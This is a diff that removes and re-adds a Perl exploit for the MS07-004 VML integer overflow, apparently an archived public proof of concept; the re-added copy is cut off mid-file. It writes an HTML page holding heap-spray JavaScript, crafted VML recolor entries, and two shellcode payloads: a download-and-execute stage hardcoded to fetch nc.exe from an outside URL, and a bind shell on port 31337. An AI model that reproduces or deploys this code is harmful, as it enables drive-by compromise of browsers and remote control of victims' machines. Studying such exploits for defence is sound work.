-#MS07-004 VML integer overflow exploit
-$html = "laz.html";
-print "(c) pang0 // www.tcbilisim.org\nbug found3d by LifeAsaGeek\nMS07-004 VML integer overflow exploit\nusage: perl $0 <shell> <opt>\n",
-"shell => -b bind(31337)\n-d down.exec if selc. -d u must a down addr. \n",
-"exam: perl $0 -b\nexam2: perl $0 -d http://blah.com/nc.exe\n" and exit if !$ARGV[0];
-#down exec
-$down =
-"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
-"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74".
-"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E".
-"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03".
-"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C".
-"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40".
-"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C".
-"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC".
-"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F".
-"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB".
-"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83".
-"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF".
-"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
-"$url";
-#metasploit 31337 bind shell
-$bind =
-"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09".
-"\x7c\xda\x38\x83\xeb\xfc\xe2\xf4\xf5\x16\x31\x75\xe1\x85\x25\xc7".
-"\xf6\x1c\x51\x54\x2d\x58\x51\x7d\x35\xf7\xa6\x3d\x71\x7d\x35\xb3".
-"\x46\x64\x51\x67\x29\x7d\x31\x71\x82\x48\x51\x39\xe7\x4d\x1a\xa1".
-"\xa5\xf8\x1a\x4c\x0e\xbd\x10\x35\x08\xbe\x31\xcc\x32\x28\xfe\x10".
-"\x7c\x99\x51\x67\x2d\x7d\x31\x5e\x82\x70\x91\xb3\x56\x60\xdb\xd3".
-"\x0a\x50\x51\xb1\x65\x58\xc6\x59\xca\x4d\x01\x5c\x82\x3f\xea\xb3".
-"\x49\x70\x51\x48\x15\xd1\x51\x78\x01\x22\xb2\xb6\x47\x72\x36\x68".
-"\xf6\xaa\xbc\x6b\x6f\x14\xe9\x0a\x61\x0b\xa9\x0a\x56\x28\x25\xe8".
-"\x61\xb7\x37\xc4\x32\x2c\x25\xee\x56\xf5\x3f\x5e\x88\x91\xd2\x3a".
-"\x5c\x16\xd8\xc7\xd9\x14\x03\x31\xfc\xd1\x8d\xc7\xdf\x2f\x89\x6b".
-"\x5a\x2f\x99\x6b\x4a\x2f\x25\xe8\x6f\x14\xa0\x51\x6f\x2f\x53\xd9".
-"\x9c\x14\x7e\x22\x79\xbb\x8d\xc7\xdf\x16\xca\x69\x5c\x83\x0a\x50".
-"\xad\xd1\xf4\xd1\x5e\x83\x0c\x6b\x5c\x83\x0a\x50\xec\x35\x5c\x71".
-"\x5e\x83\x0c\x68\x5d\x28\x8f\xc7\xd9\xef\xb2\xdf\x70\xba\xa3\x6f".
-"\xf6\xaa\x8f\xc7\xd9\x1a\xb0\x5c\x6f\x14\xb9\x55\x80\x99\xb0\x68".
-"\x50\x55\x16\xb1\xee\x16\x9e\xb1\xeb\x4d\x1a\xcb\xa3\x82\x98\x15".
-"\xf7\x3e\xf6\xab\x84\x06\xe2\x93\xa2\xd7\xb2\x4a\xf7\xcf\xcc\xc7".
-"\x7c\x38\x25\xee\x52\x2b\x88\x69\x58\x2d\xb0\x39\x58\x2d\x8f\x69".
-"\xf6\xac\xb2\x95\xd0\x79\x14\x6b\xf6\xaa\xb0\xc7\xf6\x4b\x25\xe8".
-"\x82\x2b\x26\xbb\xcd\x18\x25\xee\x5b\x83\x0a\x50\xf9\xf6\xde\x67".
-"\x5a\x83\x0c\xc7\xd9\x7c\xda\x38";
-if ($ARGV[0] eq '-d'){
-$shlaz = $down;$url = $ARGV[1];$url = "http://pang0.by.ru/wget/nc.exe";
-print "u must start http:// or ftp://\n" and exit if !($url =~ /http|ftp/);
-}
-$shlaz = $bind if $ARGV[0] eq '-b';
-#citation to metasploit
-sub dongu {
-        my $data = shift;
-        my $mode = shift() || 'LE';
-        my $code = '';
-
-        my $idx = 0;
-
-        if (length($data) % 2 != 0) {
-                $data .= substr($data, -1, 1);
-        }
-
-        while ($idx < length($data) - 1) {
-                my $c1 = ord(substr($data, $idx, 1));
-                my $c2 = ord(substr($data, $idx+1, 1));
-                if ($mode eq 'LE') {
-                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
-                } else {
-                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
-                }
-                $idx += 2;
-        }
-
-        return $code;
-}
-$sh3llz = dongu($shlaz);
-#_
-$body = <<BODY;
-<html xmlns:v="urn:schemas-microsoft-com:vml">
-
-<head>
-<object id="VMLRender"
-classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
-</object>
-<style>
-v\\:* { behavior: url(#VMLRender); }
-</style>
-</head>
-
-<body>
-
-<SCRIPT language="javascript">
-shellcode =
-unescape("%u9090%u9090$sh3llz");
-
-bigblock = unescape("%u0505%u0505");
-headersize = 20;
-slackspace = headersize+shellcode.length;
-while (bigblock.length<slackspace) bigblock+=bigblock;
-fillblock = bigblock.substring(0, slackspace);
-block = bigblock.substring(0, bigblock.length-slackspace);
-while(block.length+slackspace<0x40000) block = block+block+fillblock;
-memory = new Array();
-for (i=0;i<350;i++) memory[i] = block + shellcode;
-
-</script>
-
-<v:rect style='width:120pt;height:80pt' fillcolor="red" >
-<v:recolorinfo recolorstate="t" numcolors="97612895">
-
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v/recolorinfo>
-</html>
-BODY
-open H,">$html" or die $! and exit;
-print H $body;
-
-# milw0rm.com [2007-01-17]
+#(c) pang0 // www.tcbilisim.org
+#bug found3d by LifeAsaGeek
+#thx => o.g. / chaos / sakkure / stansar / xoron
+#MS07-004 VML integer overflow exploit
+$html = "laz.html";
+print "(c) pang0 // www.tcbilisim.org\nbug found3d by LifeAsaGeek\nMS07-004 VML integer overflow exploit\nusage: perl $0 <shell> <opt>\n",
+"shell => -b bind(31337)\n-d down.exec if selc. -d u must a down addr. \n",
+"exam: perl $0 -b\nexam2: perl $0 -d http://blah.com/nc.exe\n" and exit if !$ARGV[0];
+#down exec
+$down =
+"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
+"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74".
+"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E".
+"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03".
+"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C".
+"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40".
+"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C".
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC".
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F".
+"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB".
+"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83".
+"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF".
+"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
+"$url";
+#metasploit 31337 bind shell
+$bind =
+"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09".
+"\x7c\xda\x38\x83\xeb\xfc\xe2\xf4\xf5\x16\x31\x75\xe1\x85\x25\xc7".
+"\xf6\x1c\x51\x54\x2d\x58\x51\x7d\x35\xf7\xa6\x3d\x71\x7d\x35\xb3".
+"\x46\x64\x51\x67\x29\x7d\x31\x71\x82\x48\x51\x39\xe7\x4d\x1a\xa1".
+"\xa5\xf8\x1a\x4c\x0e\xbd\x10\x35\x08\xbe\x31\xcc\x32\x28\xfe\x10".
+"\x7c\x99\x51\x67\x2d\x7d\x31\x5e\x82\x70\x91\xb3\x56\x60\xdb\xd3".
+"\x0a\x50\x51\xb1\x65\x58\xc6\x59\xca\x4d\x01\x5c\x82\x3f\xea\xb3".
+"\x49\x70\x51\x48\x15\xd1\x51\x78\x01\x22\xb2\xb6\x47\x72\x36\x68".
+"\xf6\xaa\xbc\x6b\x6f\x14\xe9\x0a\x61\x0b\xa9\x0a\x56\x28\x25\xe8".
+"\x61\xb7\x37\xc4\x32\x2c\x25\xee\x56\xf5\x3f\x5e\x88\x91\xd2\x3a".
+"\x5c\x16\xd8\xc7\xd9\x14\x03\x31\xfc\xd1\x8d\xc7\xdf\x2f\x89\x6b".
+"\x5a\x2f\x99\x6b\x4a\x2f\x25\xe8\x6f\x14\xa0\x51\x6f\x2f\x53\xd9".
+"\x9c\x14\x7e\x22\x79\xbb\x8d\xc7\xdf\x16\xca\x69\x5c\x83\x0a\x50".
+"\xad\xd1\xf4\xd1\x5e\x83\x0c\x6b\x5c\x83\x0a\x50\xec\x35\x5c\x71".
+"\x5e\x83\x0c\x68\x5d\x28\x8f\xc7\xd9\xef\xb2\xdf\x70\xba\xa3\x6f".
+"\xf6\xaa\x8f\xc7\xd9\x1a\xb0\x5c\x6f\x14\xb9\x55\x80\x99\xb0\x68".
+"\x50\x55\x16\xb1\xee\x16\x9e\xb1\xeb\x4d\x1a\xcb\xa3\x82\x98\x15".
+"\xf7\x3e\xf6\xab\x84\x06\xe2\x93\xa2\xd7\xb2\x4a\xf7\xcf\xcc\xc7".
+"\x7c\x38\x25\xee\x52\x2b\x88\x69\x58\x2d\xb0\x39\x58\x2d\x8f\x69".
+"\xf6\xac\xb2\x95\xd0\x79\x14\x6b\xf6\xaa\xb0\xc7\xf6\x4b\x25\xe8".
+"\x82\x2b\x26\xbb\xcd\x18\x25\xee\x5b\x83\x0a\x50\xf9\xf6\xde\x67".
+"\x5a\x83\x0c\xc7\xd9\x7c\xda\x38";
+if ($ARGV[0] eq '-d'){
+$shlaz = $down;$url = $ARGV[1];$url = "http://pang0.by.ru/wget/nc.exe";
+print "u must start http:// or ftp://\n" and exit if !($url =~ /http|ftp/);
+}
+$shlaz = $bind if $ARGV[0] eq '-b';
+#citation to metasploit
+sub dongu {
+        my $data = shift;
+        my $mode = shift() || 'LE';
+        my $code = '';
+
+        my $idx = 0;
+
+        if (length($data) % 2 != 0) {
+                $data .= substr($data, -1, 1);
+        }
+
+        while ($idx < length($data) - 1) {
+                my $c1 = ord(substr($data, $idx, 1));
+                my $c2 = ord(substr($data, $idx+1, 1));
+                if ($mode eq 'LE') {
+                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
+                } else {
+                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
+                }
+                $idx += 2;
+        }
+
+        return $code;
+}
+$sh3llz = dongu($shlaz);
+#_
+$body = <<BODY;
+<html xmlns:v="urn:schemas-microsoft-com:vml">
+
+<head>
+<object id="VMLRender"
+classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
+</object>
+<style>
+v\\:* { behavior: url(#VMLRender); }
+</style>
+</head>
+
+<body>
+
+<SCRIPT language="javascript">
+shellcode =
+unescape("%u9090%u9090$sh3llz");
+
+bigblock = unescape("%u0505%u0505");
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<350;i++) memory[i] = block + shellcode;
+
+</script>
+
+<v:rect style='width:120pt;height:80pt' fillcolor="red" >
+<v:recolorinfo recolorstate="t" numcolors="97612895">
+
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
